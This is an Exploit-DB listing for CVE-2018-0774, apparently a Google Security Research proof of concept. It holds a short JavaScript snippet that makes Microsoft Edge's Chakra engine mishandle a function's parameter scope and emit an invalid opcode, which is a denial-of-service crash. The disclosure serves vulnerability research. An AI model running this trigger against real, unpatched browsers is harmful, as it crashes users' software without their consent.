Microsoft Edge Chakra - Incorrect Scope Handling

EDB-ID: 43715
Author: Google Security Research
Published: 2018-01-17
CVE: CVE-2018-0774
Type: Dos
Platform: Windows
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

  
 (function func(arg = function () { 
     print(func);  // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function. 
 }()) { 
     print(func); 
     function func() { 
  
     } 
 })(); 
  
 // Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.

Source: www.exploit-db.com